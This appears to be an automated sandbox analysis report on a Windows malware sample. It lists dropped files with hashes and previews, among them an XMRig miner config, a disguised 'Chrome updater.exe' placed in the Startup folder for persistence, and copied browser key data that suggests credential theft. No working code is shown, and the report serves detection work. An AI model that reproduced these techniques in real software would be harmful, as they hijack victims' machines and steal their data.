                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpE771.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpE772.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpE7C1.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpF3F.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):349054
                                                                                                                                                                                            Entropy (8bit):6.015923338738634
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:LaqfIlUOoSiuRZ8Acx6ZaurE5/EDnJpAl9SeefNqWF4iVx/9LPeq/1LHm/dB0:8o5xzurRDn9nfNxF4ijZVtilB0
                                                                                                                                                                                            MD5:8F78FB2B979EA740DEBFFA2E7C0C8BC1
                                                                                                                                                                                            SHA1:CB25EF1BE9D2FA7F887CEF502AFEF53124CC6611
                                                                                                                                                                                            SHA-256:67B3629D611456470A840311D6A9DE0D0DF5BF39231C6391FFEECF97DB11CE11
                                                                                                                                                                                            SHA-512:924B1B4D676B58F7780A37211C1C44BCDC68BEF2C0A86E701F09EBD761EDEE03355BAAB1B70D98B2F9FD17010FA8DF495F29CFDE3971CF0922B32ABFCBC40CF5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601476985175213e+12,"network":1.601452328e+12,"ticks":615129919.0,"uncertainty":4535485.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABUPWY4cSyAQZRX3j8/SLmMAAAAAAIAAAAAABBmAAAAAQAAIAAAACC7lwCjByxIY/Ds1S6cdCxJW6iSr1QfjoKlVKoVEQ4EAAAAAA6AAAAAAgAAIAAAAD9PMfiGkWkdrfU+zeMpOLPS1eDxLpcgjYP2R/ndeCNxMAAAAK+RpovfP61NtB5nOpQgPMjPTyt2T1WPeru9i3yP05zNVEj0uCRDWfONruG9ricX1kAAAADB9KtQ9KY2z38GdfaF7dW2ZLcAMHOX2oEKBg8ZJG9lsuMexxChB4M8HFpyb0Bpr6axpi+zmMIXt76noTOxFzKN"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245950075265799"},"policy":{"last_statistics_update":"13245950583241
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpFBD.tmp
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF0D69581CA4326ACC.TMP
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):34829
                                                                                                                                                                                            Entropy (8bit):0.43316894516878646
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:kBqoxKAuvScS+GAVAVhVNIVNy7NY+3uZNmoshXoSD2w:kBqoxKAuvScS+GAVAVhVKVI72++TyL2w
                                                                                                                                                                                            MD5:150B9EC81456D98B116FD8ADC9B9D46B
                                                                                                                                                                                            SHA1:8320AA28759244472B1A7BD55BCE22E04631E125
                                                                                                                                                                                            SHA-256:798DF166AA60096072E69107A1FC6826A1421B597E04C78A7326D7AFDC4DEE10
                                                                                                                                                                                            SHA-512:9ED9B5C5C11905326E54D768EA912A481898047CEF118397D663F0681FE4224242C6BD97D35031D24A723A57ED9DF7B0A4193073AAE8EF202E52D30CE9457783
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF2D25D182B81723B0.TMP
                                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):12917
                                                                                                                                                                                            Entropy (8bit):0.3979872906704968
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:c9lLh9lLh9lIn9lIn9loVB9loVh9lWVZeS7VSPhA:kBqoIVqV0VES7VSZA
                                                                                                                                                                                            MD5:86A84E714CA2136CC3242127481C22ED
                                                                                                                                                                                            SHA1:9DD51F570A7917AC140EE4222272E0957E5B64BA
                                                                                                                                                                                            SHA-256:8EAC6096D18F05FFACBBDF9E2C41B9D8953344EC45FF63765D64C372392C7E91
                                                                                                                                                                                            SHA-512:F3408FF2DD7D6085CCBDBD837FD1439F5CD39028CB76F0067A0E0F0CE4044B3A8BFD1E1331438B5BD9AAD8331F76BB3C044AD72A87B97B1061C0E9F5F89645C9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\lxoqz3o0.exe
                                                                                                                                                                                            Process:C:\Users\user\Desktop\8TD8GfTtaW.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2611424
                                                                                                                                                                                            Entropy (8bit):7.959583416242755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
                                                                                                                                                                                            MD5:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                                                                                                            SHA1:4E0FBC13AF6C373C9944A53A40965517B619C274
                                                                                                                                                                                            SHA-256:83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
                                                                                                                                                                                            SHA-512:83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`.................P..........X.E.. ........@.. .......................@m.......(...@.................................:...P.....................'..6.......................................................................................... .`... ...*.................. ..` ............................@..@ .............2..............@..B.idata... ...........4..............@....rsrc.... ...........6..............@..@.themida..D..........<..............`....boot....f'...E..f'..<..............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Local\nulhfhsi.exe
                                                                                                                                                                                            Process:C:\Users\user\Desktop\8TD8GfTtaW.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4964504
                                                                                                                                                                                            Entropy (8bit):7.901098351320417
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:3Fo69yX+tlgGpThihQhFGooC309rxysgTNmYZHxgXVh:3vwweGfU4Uoz3YrxysghN1+j
                                                                                                                                                                                            MD5:70DCA411445D3B4394D9C467BF3FF994
                                                                                                                                                                                            SHA1:83F9120B2B184EB991D1DCBF4BB13D5F2F4A6097
                                                                                                                                                                                            SHA-256:1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
                                                                                                                                                                                            SHA-512:4A2F84A8FB4BB0EBA8402EB417CADB8BCEF6AC309EE4918A698CAB756EA888FF076545E1ED02F85F5705FE15F7EB7EC01B68C3BC98F74B4E13F5B8E4F0184CD6
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 24%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C................0.. ..........\d... ...@....@.. .............................d.K...@.................................0L..d........?............K..............................................................`..P........................... . ... ...................... ..` O....@......................@..@ ............................@..@.idata... ..........................@....apk0....@... ......................@..@.themida..(..`......................`....boot.........9.....................`..`.apk1....2....G.....................`..`.apk2... YE.. Z..\E.................`..`.reloc...............`E.............@..@.rsrc....?.......@...hE.............@..@........................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\revs.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4602592
                                                                                                                                                                                            Entropy (8bit):7.945985609581206
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:98304:QPvYDnmWwqsSgx0Yn+bQVacRCBdYPtON7x2ojsU2xLQ2dG:QPAmfSgx0Y+bQQB7x2ojszxLI
                                                                                                                                                                                            MD5:029CE2E532FE5C70D3342F978F5463D0
                                                                                                                                                                                            SHA1:E4E3041B291F1E581DEEBC1C219E1DF3FCCC0A6B
                                                                                                                                                                                            SHA-256:507A7B00E9FBE68E5DD732BEA1BCE17F0451AB6C1250970A7CF0DDF5FBC2B83E
                                                                                                                                                                                            SHA-512:380EE1044A9FE7170965166DDDF5D8731301A3A681462FD4946F505E556B2A278CFEC09D9113B8DE4B75499BA27CBB04E8BC40374DD8ED0E1959BE3B20B972B1
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....g$`.....................2......X.b.. ........@.. ..............................b=F.....................................:@..P....`................F..6.......................................................................................... ..... ...z.................. ..` .0...........~..............@..@ ..... ......................@..B.idata... ...@......................@....rsrc....0...`...0..................@..@.themida..`.........................`....boot....@E...b..@E.................`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\lxoqz3o0.exe
                                                                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):14544
                                                                                                                                                                                            Entropy (8bit):6.2660301556221185
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Windows\CPU\config.json
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\lxoqz3o0.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2275
                                                                                                                                                                                            Entropy (8bit):3.9887353957446137
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:CtWTHcfLWHW8b9b2lZ9lDfnncC519ECoECyo12udQdJtK59:CtWTGyHocCOCZCN2uYOH
                                                                                                                                                                                            MD5:DF3803B8B18481FBC63A8E2CECF22500
                                                                                                                                                                                            SHA1:B44877D6F781A28F1AD3F0CC337C9C3CC7BFFD96
                                                                                                                                                                                            SHA-256:B60A267608EA13830BFE41C7EE0F726A6562855112CF2310332DAD43854E370A
                                                                                                                                                                                            SHA-512:8FAB13258B597C5363C727A3208426A17DC1D66AAEBEE4977B2B5C8EB4044F09626167A75E69831A45095CA2B8CFAAA57ECA6FEA93A643F43266943765F7538D
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, Author: Joe Security
                                                                                                                                                                                            Preview: {. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 100,. "asm": true,. "argon2-impl": null,. "astrobwt-max-size": 550,. "cn/0": false,. "cn-lite/0": false,. "kawpow": false. },. "opencl": {. "enabled": fal
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\lxoqz3o0.exe
                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6889640
                                                                                                                                                                                            Entropy (8bit):7.882305690463656
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:196608:1YWVn8cTUWrpYpHqtbxxfDpidYLDH+D1W+4vYz3RVB:1YW2aJrpOHqtb4dYLDHtvY1j
                                                                                                                                                                                            MD5:E95F766A3748042EFBF0F05D823F82B7
                                                                                                                                                                                            SHA1:FA4A29F9B95F4491E07EBA54A677D52D8D061A19
                                                                                                                                                                                            SHA-256:1AEF2FBA4058AD80E4AE16DCE0D2609E9F946BA9A4F2203891A26A92B3F6578C
                                                                                                                                                                                            SHA-512:E4D61199B57AE189C2BEF7ADC661224CFB00E9D6B3526C07624911238AAD2D81D9548B52DB1C6DBBF4A0E3F766D57080D2414CA836E037F0BB39728D1F1AF55C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview: MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......p|v.4...4...4...ou......ou..9...ou.........0....l..'....l..>....l.......o..&...ou..!...4...k....l..+....o.......o.......o..0....o.5...4...5....o..5...Rich4...................PE..d......`..........".......1...r......R.........@....................................cji...`............................................................o.1.@.........i............. .......................0u..h...0...8............p..h............................text.....1......................... ..`.rdata.......1.....................@..@.data....@+..0D.....................@....pdata........o.....................@..@_RANDOMX......q.....................@..`_SHA3_25@.....q.....................@..`_TEXT_CN......q.....................@..`_TEXT_CN......q.....................@..`_RDATA........q.....................@..@0.............q.....................`..`1.......P?c......@c.............
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\lxoqz3o0.exe
                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2611424
                                                                                                                                                                                            Entropy (8bit):7.959583416242755
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:49152:h2hQa6GzMPl06GX74Y0ae1K+qWhbQjKHiSxLTDhK9wVjGHTkg:h2h7Nzi5k7B09E+fhbQjKHfDs9+jGd
                                                                                                                                                                                            MD5:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                                                                                                            SHA1:4E0FBC13AF6C373C9944A53A40965517B619C274
                                                                                                                                                                                            SHA-256:83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
                                                                                                                                                                                            SHA-512:83BFDD06BF7E3497D6D0EC1686EDE07D11003057919CDB74B3224E1DEEB6DFA9259A83344C419CA0B2DEC4CD42292C6047D842EEB09CF3459D6AC6C21130533F
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`.................P..........X.E.. ........@.. .......................@m.......(...@.................................:...P.....................'..6.......................................................................................... .`... ...*.................. ..` ............................@..@ .............2..............@..B.idata... ...........4..............@....rsrc.... ...........6..............@..@.themida..D..........<..............`....boot....f'...E..f'..<..............`..`........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Windows\cpu.zip
                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\lxoqz3o0.exe
                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6296834
                                                                                                                                                                                            Entropy (8bit):7.9998772929856505
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:196608:EYt1C1WmUAsFnYtr+h3HbZe18JZPSXpzCC9o:EYMWDFnor+h3o18JZP8Po
                                                                                                                                                                                            MD5:E9695400A2205B4F8ECEB8B635BE7AA1
                                                                                                                                                                                            SHA1:9071EF76AABFD7A05F7470460C4D92D89D4D2668
                                                                                                                                                                                            SHA-256:66F209A9972C6E1A88E572697425A936A5DC028B2D8BC29FDDACA98FF25434B4
                                                                                                                                                                                            SHA-512:5EDDF9D73675E327141B820ABBBC98336DE991D50AD5D30AA15F41DF10BBB9F0E47FFD57F8600F6B5CE0E319D463F9D40EF88E9D11C884121D56B2677E91E25A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: PK.........z:Rgw..............config.json.V.n.0...+..C.v...-@rKQ iQ.Ea.....C.K..{Iy.D.E...C...=>.?W..*.......3.2<.V...x.,NP.<.....v...,4..K..{.jr>.....h.~...Z...{&.....Vh.i1:.J..U.[.....5...u.rU1.&.WH..n..h.......l......fh...NS..2.....?...B...........Y..q..r.L......^...e\b...xN..J.^:.$d.Vx..EL.T>.'....O."V~w.4...%.x;.:....5#.N..D&.. .\s..\....X...<<.b.E....(.l.).q..4B+.Yl..K.#08..h.~m.u.q.#MP"g.....Q....]?[.......[..T[.k._"j....S...B..c...L...-.v..4Ub.4.x.1.c..?..e......]../.I.<.r$u`3ZOG.U5..|x.."].:..o..<..><......=.?=.K-...@./N.?...X...J&...Vk.._j...;.......M.ly_..j%..`.Dp$Wn.wt.."....q.........WM..C..5....e..q.a.u.n..>...zV.s!...{m..$....D.y.|..N+....E....A.0]....D.R..Ar.E...u2....)5T.SJ.....yw*..PK........T"URu.G.$._.. i.....cpu.exe.Zg8...^......%.-....[..;W.. ....DY..e.%......6..\............y..s.o.9.e..........5....C...s......u....F9.4G9...}..=.....p..O_v.{vo?.vg.v%..vwO;{a22b.?...~.Y..1.O_O?.H.[....V.F^bdU.R.=.|...y.V2G..J..".,.d...3E

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Entropy (8bit):7.957151149611014
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                            File name:8TD8GfTtaW.exe
                                                                                                                                                                                            File size:2649312
                                                                                                                                                                                            MD5:a5d3fdf55abb54ec0b632dee9d3459d4
                                                                                                                                                                                            SHA1:c177421eb77f0d341e5d1bd6cfbccb60e0c86a1c
                                                                                                                                                                                            SHA256:677618666eb31c80e9dbecb17907676d2da2a39d24f7c20785ef577239ef5e6f
                                                                                                                                                                                            SHA512:4faafc484d66545a3355ba4d76da6dd021b556a06ec5b15fa8b4b8a4f1161b44ffad5e654991cf658fc6bd49b458e59586155dfdf339e1150b278ff5b9a41324
                                                                                                                                                                                            SSDEEP:49152:isJSe3JHLCsRW6jvMtf66fjjSDmJz1nwIDcdAL4+wmvmgd3qwnfKkAeHYmGA5G8:Jge5HGsRWgvMV66Smh+IDcdAEAvmgE2T
                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1`............................X.E.. ...@....@.. ........................m.......(...@................................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:00828e8e8686b000

                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                            General

                                                                                                                                                                                            Entrypoint:0x858058
                                                                                                                                                                                            Entrypoint Section:.boot
                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE
